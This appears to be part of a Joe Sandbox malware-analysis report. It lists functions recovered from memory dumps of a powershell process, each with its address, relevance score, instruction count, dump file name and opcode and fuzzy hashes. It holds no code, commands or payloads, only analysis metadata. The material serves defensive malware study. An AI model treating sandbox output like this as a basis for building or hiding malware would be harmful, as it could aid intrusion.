Function 040AA5B8 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a10a97386b7fd26202ae09e39284d0433c3ee192ba8df9f21422b1f4c61e09
Instruction ID: 2388dc1508c64271cd2164384c2f0fc8f733397425ca88e65006a42545e99711
Opcode Fuzzy Hash: 31a10a97386b7fd26202ae09e39284d0433c3ee192ba8df9f21422b1f4c61e09
Instruction Fuzzy Hash: 03C11974B01258AFCB45CFA8D484A9EBBF2BF48310F198159E849AB391C735ED95CF90

Function 040AAE68 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c625d8225b87a5a899720229ba967580e00e2b1cb31d870277f74dbd627c89
Instruction ID: f66da9393a9e25ea2353cd680985c12b3197a1a454dd5b733c44f49fd57efb71
Opcode Fuzzy Hash: 71c625d8225b87a5a899720229ba967580e00e2b1cb31d870277f74dbd627c89
Instruction Fuzzy Hash: 7BB1E474A01218EFDB55CFA8D484A9DBBF2FF88310F248559E805AB365C771ED92CB90

Function 040AC3D8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b8fdf854644fbcb56e8234a744ffb067e46f8a0392bbf0fb6c9e23f2d5123a
Instruction ID: ff8f73b372025d454134e66b7d3cfb96ec08d2904ca83c4c45596b862c1c79fe
Opcode Fuzzy Hash: 28b8fdf854644fbcb56e8234a744ffb067e46f8a0392bbf0fb6c9e23f2d5123a
Instruction Fuzzy Hash: 11B1F574A052189FEB45DFA8D584A9DFBF2BF88310F25C159E809AB355DB30ED81CB90

Function 0671037F Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73873673b0e32d6cc7778adef744ecb19af6501fbc0af70fab28f943c1e3ca9
Instruction ID: 227dda260c01b519038699a89d3596cd3051325dd9b3a37357cd0539e22efb45
Opcode Fuzzy Hash: c73873673b0e32d6cc7778adef744ecb19af6501fbc0af70fab28f943c1e3ca9
Instruction Fuzzy Hash: 61B1E774E15218CFEB94CF69D885BADBBF2FB49304F1090AAD409AB251DB746AC4CF41

Function 040A8880 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb432c24aca43bd8a221e06c8364bf55a6f00aeb5cac53ce0666decbafce36cb
Instruction ID: e0a9ed7dae0f0a44d296e2d88308fa66c8b6a48bd822c091dc3b9eb13b0a2425
Opcode Fuzzy Hash: eb432c24aca43bd8a221e06c8364bf55a6f00aeb5cac53ce0666decbafce36cb
Instruction Fuzzy Hash: 53918E35A00218DFDB14EFA5C994BADBBF2AF84354F14C429D409AB390DB35AD56CB81

Function 068E851C Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf405b84cf04ff253041806ff205e2772562fcde8f3c26c9df403d940a47635
Instruction ID: 6bfd36e93b7939c6873afd3fbbbf489d1cbd54b94c95cfcf5cf85c8ee1745d04
Opcode Fuzzy Hash: 1bf405b84cf04ff253041806ff205e2772562fcde8f3c26c9df403d940a47635
Instruction Fuzzy Hash: E781C0B4F002089FDB64CF28C544A6E77E6AF86314F588455DA05EF2A0DB31ED45CBA1

Function 068E8530 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4451d185326880fa318ddc33cdb64f19ffab1969099adee3431944862f040e2f
Instruction ID: 233a2b366032016268ebcf425b23f3f39cff20e73211f7bac7da2c773237e2d6
Opcode Fuzzy Hash: 4451d185326880fa318ddc33cdb64f19ffab1969099adee3431944862f040e2f
Instruction Fuzzy Hash: 4B81D0B0F002089FDB68CF28C545A6E77E6AF86714F58C455DA05EB3A0DB31EC45CBA1

Function 040AA970 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9006a5465178210131f1758a20885f8467828361ad72295cdff00e59dba04cdd
Instruction ID: 0f688239b1f5bf2eefaea43fb26e09dfd6eafe029e5fe5df8ae0e0a091cc302f
Opcode Fuzzy Hash: 9006a5465178210131f1758a20885f8467828361ad72295cdff00e59dba04cdd
Instruction Fuzzy Hash: A7718061A0E3D55FC703DB6CC9A08DA7FB1AF4722071941C3D095DB2A3E225AC59CBE6

Function 040A30B0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447a78a08c6ab643744c94ebc451e7a4312d6407c18d48ad82a7b2c1dde12c5d
Instruction ID: f558583117b43465ce8c3fdc8755d97e809e685bbeffe6928e00019ac4c1d97e
Opcode Fuzzy Hash: 447a78a08c6ab643744c94ebc451e7a4312d6407c18d48ad82a7b2c1dde12c5d
Instruction Fuzzy Hash: D3918D74A002459FCB15CF98C894AAEFBF1FF88314B248699D915AB365C735FC51CB90

Function 040AA7E1 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb555e5b1faea99f20e5da5da39c5a06a13b6012a9daab10f823b41dcba6731
Instruction ID: f1fa3cc130c220d580600681065b15c6231ba1d6904bf6bde42bd64db90b673b
Opcode Fuzzy Hash: 9fb555e5b1faea99f20e5da5da39c5a06a13b6012a9daab10f823b41dcba6731
Instruction Fuzzy Hash: 89511D74A00259EFCB45CFA8D584A9EBBF2BF88310F288559E409AB355C735ED92CF50

Function 040AB07F Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5839580b4573cbe49f6c2efdd3ae0cd667aaf25f040dedb909c59ae4d7c73b
Instruction ID: 6430febc1ceacf44ec0fe78fb17357177fe42fd043f4933a959e93f93d4c5853
Opcode Fuzzy Hash: cf5839580b4573cbe49f6c2efdd3ae0cd667aaf25f040dedb909c59ae4d7c73b
Instruction Fuzzy Hash: 0E51E674A01209EFDB05CFA8D484A9DFBF2FF88314F248559E505AB365C775AD82CB90

Function 040AC5E9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9a59227385bdc16d5e1764d62b85e972fedfc470eb7863fe26efb59ffb3ee1
Instruction ID: c83c15395f90083df1202298d6c657fa9c2ea64c8d9d41ea5a9476349ccd94fe
Opcode Fuzzy Hash: 1e9a59227385bdc16d5e1764d62b85e972fedfc470eb7863fe26efb59ffb3ee1
Instruction Fuzzy Hash: 6C51C474A042089FDB05DFA8D584A9DFBF2EF88314F25C559E409AB365CB35ED82CB90

Function 067108F9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643e385c025371dd525259b89b6f5ebf58c189375327e496012021cb11cdeb2a
Instruction ID: 4df0f495ae43aec920febdba9b23aacb0fb0e725e6b6976862739bd1749b4d06
Opcode Fuzzy Hash: 643e385c025371dd525259b89b6f5ebf58c189375327e496012021cb11cdeb2a
Instruction Fuzzy Hash: 2741D874E01218DFDB58DFB9C45469DBBB2FF89304F20812AD419AB351DB719982CF50

Function 06710908 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bd69e6318b28f31c1285f7618c791c4975c6192812367ef0ca60aa86b7af1e
Instruction ID: d03103bff0bc61a2ea29ea648c8f6e357004ac38ed93ff4e09b3f1bdbe7077dc
Opcode Fuzzy Hash: 52bd69e6318b28f31c1285f7618c791c4975c6192812367ef0ca60aa86b7af1e
Instruction Fuzzy Hash: 0F51B574E01208DFDB58DFB9D594AADBBB2FF89304F20812AD419AB350DB359986CF40

Function 0672AF80 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8698d4db154d455b7cc0e9fe8788af80832e34e456ed00973b70caf5e8a2f866
Instruction ID: 5b6f9cda89a20594c7781faf47cdcb86605664e0e4e4f5626f4bde1a5129b485
Opcode Fuzzy Hash: 8698d4db154d455b7cc0e9fe8788af80832e34e456ed00973b70caf5e8a2f866
Instruction Fuzzy Hash: 5B416AB0D0021ADFDB84DFA9D8446AEBBF2FF89304F108469E814E3654DB38AA45CF50

Function 0672AC90 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1624c6abbd936d62482fb3c0abc1d4707619dc90f1b2c8bbfe27e382b0049d0
Instruction ID: 33ece349137533a9e4fce274b192c4bab95cc10b4f22ab2fd60d7bfa97425831
Opcode Fuzzy Hash: f1624c6abbd936d62482fb3c0abc1d4707619dc90f1b2c8bbfe27e382b0049d0
Instruction Fuzzy Hash: 4051D7B0900219CFDBA4DF68D995BA9B7B2FB48300F1091A9EA09E7354DB306E85CF50

Function 040A31C0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc2809059d4d0d07be3c1309080a521cf28fbe3c79a14ed4a2106b1f4503dea2
Instruction ID: 22f7225d20ba672c642f4cc6e75c03e66aeded3be317b7b2bbfa5be70fe43336
Opcode Fuzzy Hash: fc2809059d4d0d07be3c1309080a521cf28fbe3c79a14ed4a2106b1f4503dea2
Instruction Fuzzy Hash: 92415874A005059FCB0ACF89C4D4AAEFBB1FF48310B258699D915AB365C736FC60CBA4

Function 068E8718 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3b47c54ba5684b86eff602984bbea4e84a514ce430a7d7b8b8cdc180ee8548
Instruction ID: ea81d8808b04dd0c102b9c76198a056835b74084b5bf67ac6062e47a06415796
Opcode Fuzzy Hash: 2c3b47c54ba5684b86eff602984bbea4e84a514ce430a7d7b8b8cdc180ee8548
Instruction Fuzzy Hash: 38416CB4B002089FCB18DF58C88596EBBE6EF89714BA9C455ED05AB350CB31ED058BE1

Function 040AA490 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d389141554f81aa651b3785d6735dee89efe9f9c39c1b1af03540ac0bc07f9
Instruction ID: 74e32ec1fe4e8ba8c2a55a18d59a7191a5e66d02c9179783862725e8af9cf660
Opcode Fuzzy Hash: 99d389141554f81aa651b3785d6735dee89efe9f9c39c1b1af03540ac0bc07f9
Instruction Fuzzy Hash: 29415C74A002058FCB55CFA9C4849AEFBF2FF88310B248A55E915AB395D735EC51CF94

Function 06718930 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f80de3940fc4467d56ddcb59e20c19081f9bf9955f6e6846ca3dc2cb9884d5
Instruction ID: 4f23f7bde4b99aaadaefcfc0fd89e0a5ac21a2a07ddd95d4002bf4f4adb401d4
Opcode Fuzzy Hash: 58f80de3940fc4467d56ddcb59e20c19081f9bf9955f6e6846ca3dc2cb9884d5
Instruction Fuzzy Hash: 2641F5B0E14108DFDB84CFAAD4556AEBBF2FB89310F14D066E814AB354DB346941CF92

Function 06717F37 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c53d64ededdd32cce04f551cea36a8026f045b5e4bf54cc41286581a6e0bfcf4
Instruction ID: 82ab7956bec3ec0205cd6a7ea70d14f23adabfd2228cf0fb25ea868f2813272e
Opcode Fuzzy Hash: c53d64ededdd32cce04f551cea36a8026f045b5e4bf54cc41286581a6e0bfcf4
Instruction Fuzzy Hash: 51411870D15118CFDBA4CF6CC949BA9BBF2FB48304F1481AAE909EB251DB346986CF41

Function 06717359 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb6e8b0fe599bb9ed5e8d705b1c4a4a6f4a9ad294017619a2cf24abe243e40a
Instruction ID: d913097a36b95eefa3c25eafada46f58b0ce238ebffc2b0052aa35b6ea398a3d
Opcode Fuzzy Hash: 6cb6e8b0fe599bb9ed5e8d705b1c4a4a6f4a9ad294017619a2cf24abe243e40a
Instruction Fuzzy Hash: 6C310A74E012189FCB09DFA9D8515EEBBF6EF89310F10806AE405BB265DF355941CBA1

Function 0672AAF9 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d98a69a6ff0f08c95b595332669ae699ff412bd815c8b88ba7e0f5cfaf11163
Instruction ID: 4be187a1d9c5ab267da768cedd8c76e4fe01cd5693cb7bd66cadd8f28ea5bcbe
Opcode Fuzzy Hash: 7d98a69a6ff0f08c95b595332669ae699ff412bd815c8b88ba7e0f5cfaf11163
Instruction Fuzzy Hash: 7A41B674900219CFDBA4DF68D995BA9B7B2FB48310F1091A9DA09E3364DF30AE85CF51

Function 0671B519 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73b5d45e4b55fc9543a3ceb50b77fa1fee0dd00e85ceeee44c7a37fb53493bc
Instruction ID: a5a45f5c17937722fa9dfc51626085117a024efd9867c46b517a97b0ab213a51
Opcode Fuzzy Hash: f73b5d45e4b55fc9543a3ceb50b77fa1fee0dd00e85ceeee44c7a37fb53493bc
Instruction Fuzzy Hash: 3F218671A001089FCF149FA9C8549EE7BB6FF8D720F148129E415BB3A0DA359882CFA4

Function 0671EDE0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18cf4f9cb2c7247b3260e8b62e98de5e706f208e11099026047f867b3ff45059
Instruction ID: 0e13729a35a539e633daa2f3c44497fc5c0c4a8318e895b358f4ac665d959c09
Opcode Fuzzy Hash: 18cf4f9cb2c7247b3260e8b62e98de5e706f208e11099026047f867b3ff45059
Instruction Fuzzy Hash: 9C212871E00219DFEB90DBB8C804BBEBBF5AF48640F108466D919DB290E734DB59CB91

Function 007AD0E4 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508036794.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59204fa175e3363d497e8a5a1df429452cc11ad5ae5136271aee2d5523017f05
Instruction ID: ae5f76af94eeea119d7ff0dec2eef408d1e9cdaae4e21afbf381acafc5f77348
Opcode Fuzzy Hash: 59204fa175e3363d497e8a5a1df429452cc11ad5ae5136271aee2d5523017f05
Instruction Fuzzy Hash: A121D3B56042489FCB15DF14D9C4B26BBA6EBD5314F24C669E80A0BA41C33ADC16CBA2

Function 040A9047 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4d485e8bcd8c8671d68bb914172a3527bd872be88509adb918b3a1f03f8c91
Instruction ID: 91c75bf839f6c8eb1d6903995b5d2fdf703b3be18eebcedd02ce11908198a21c
Opcode Fuzzy Hash: 7f4d485e8bcd8c8671d68bb914172a3527bd872be88509adb918b3a1f03f8c91
Instruction Fuzzy Hash: 2921C2B4B042559FCB02CF88C8949EDBBB2FF89310B158995D445EB762C731BC51CB90

Function 040A9098 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eadd508bc2315046943abece32637a959f3bd43904a799cca477a8f4285151c
Instruction ID: 4a6390c50e1aa379be56048cd97db52a7fdc30c2e3ab715e62158b3f0e3f59b5
Opcode Fuzzy Hash: 2eadd508bc2315046943abece32637a959f3bd43904a799cca477a8f4285151c
Instruction Fuzzy Hash: 0E2116B4A001199FCB04CF98C9849AAFBF1FF8C310B258969E919AB311C735FD51CBA0

Function 0672AF90 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060ad31be8e2a67cbc6186e1a102087279ab1e3fa6dbac4bb1a98f2117cc58d4
Instruction ID: 57d09f5fea83943d09cfdd6f5e3c5d222d3b1c8ae71af07f5aa867ba29cdd4bc
Opcode Fuzzy Hash: 060ad31be8e2a67cbc6186e1a102087279ab1e3fa6dbac4bb1a98f2117cc58d4
Instruction Fuzzy Hash: 622166B0E0021ADFDB44DFA9D8446BEBBF6FB89304F108465E515A3294DB786A45CFA0

Function 067060B8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf1294c30b280ae5515a576511e09ce70a1e5e5a87f0348c29b62c6cbda03c1
Instruction ID: d7f6eedf9aa7d0b9c0e89210ada56f4640946f6c1773fa1da8737a65aa985b2f
Opcode Fuzzy Hash: 8bf1294c30b280ae5515a576511e09ce70a1e5e5a87f0348c29b62c6cbda03c1
Instruction Fuzzy Hash: 9E2157B4E1921DCFEB44DFA9D4586EEBBF6BF88300F10802AD005B3290DB740A54CBA0

Function 06710FE0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a9826e9ce7b5840d5f9e225ee16772df30808abea37e6d6716ab7605ad2754
Instruction ID: ab986c5871b0b0ba38d735ce01bc315841b25ccdfa713d67fdd1b845e2636fd0
Opcode Fuzzy Hash: b0a9826e9ce7b5840d5f9e225ee16772df30808abea37e6d6716ab7605ad2754
Instruction Fuzzy Hash: A5215AB0E1424DDFCB44DFA9C1856BEBBB6FB44300F5081AAD908AB341DB35A991CF90

Function 06718408 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0c3347bdc4eea40e2e35d19119e082f5c043bda867c3f8e1f3eb47416d7c91
Instruction ID: a106abc1cc63aa0c5c6ce325b80a352cfce76637d604a4e4f66cc0c57bf9a501
Opcode Fuzzy Hash: fb0c3347bdc4eea40e2e35d19119e082f5c043bda867c3f8e1f3eb47416d7c91
Instruction Fuzzy Hash: B9212A74D05208EFDB84DFACD454AADBFF5EB49211F5080AAD908AB251DB345A81CB41

Function 0671BEB0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87102442d149c91428eab909f5b27da5977315a18d5b4a037a2975c7e477a5a5
Instruction ID: 2ffa4104f94c49900f5489bd5cc599749faa116edcf313a0d9ea3214cc41bacb
Opcode Fuzzy Hash: 87102442d149c91428eab909f5b27da5977315a18d5b4a037a2975c7e477a5a5
Instruction Fuzzy Hash: 5311B934B102149FCB609F6C8844BBE7BF6AB88B10F00402AE555DB240DB78C941CFA0

Function 040A8568 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b137cc6d10e10f1c7058431314d1b8708caabf79ac968dc4f464905d27cf065f
Instruction ID: c873447f568d88bfc3961bc49cdde91e353d27dc9653084c2bb691d5a73869c3
Opcode Fuzzy Hash: b137cc6d10e10f1c7058431314d1b8708caabf79ac968dc4f464905d27cf065f
Instruction Fuzzy Hash: 0C119E75B002049FCB04EF68E891A6E7BB6EBC9310F144469E9099B355DF35AD0587A2

Function 06FE2F68 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b88e8880d26d46903c6569c1d4ab34d02cd2c8041104930abde0128ca49e556
Instruction ID: 7333195b3be6c8de80514443c5d64571201dc0ae5b2c0760170af0e6bf5071aa
Opcode Fuzzy Hash: 9b88e8880d26d46903c6569c1d4ab34d02cd2c8041104930abde0128ca49e556
Instruction Fuzzy Hash: EF11C236E003058FDBA09B29840576ABFB5AF90714F55843AC5099B280E73AD685CBD1

Function 007AD0DF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508036794.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1194c05243592a2c623da779cc516d895bc1fc3bdf2be109d6bec0486cc6047
Instruction ID: d3ad5e43522ee892772c8a6360707611e9f6dccad6d94ee56f324e8b91a8a523
Opcode Fuzzy Hash: e1194c05243592a2c623da779cc516d895bc1fc3bdf2be109d6bec0486cc6047
Instruction Fuzzy Hash: 6811E676504284CFCB11CF10D9C4B16BF72FB85324F24C6A9D8094BA56C33AD81ACBA2

Function 06717D70 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a05031de2d3c18e175ad70bdfb2bb55aa6ce03473bd792d8186cdf55f4d2cc1
Instruction ID: 7462e4a0688ced7fa0b5fcde4b2daba2f833832bbc10808c8df567c059fc3089
Opcode Fuzzy Hash: 7a05031de2d3c18e175ad70bdfb2bb55aa6ce03473bd792d8186cdf55f4d2cc1
Instruction Fuzzy Hash: C7211A70E00148CFDB58DFA9D8886ADBBB2FB89304F1090669509AB359DF306D85CF50

Function 040A8578 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
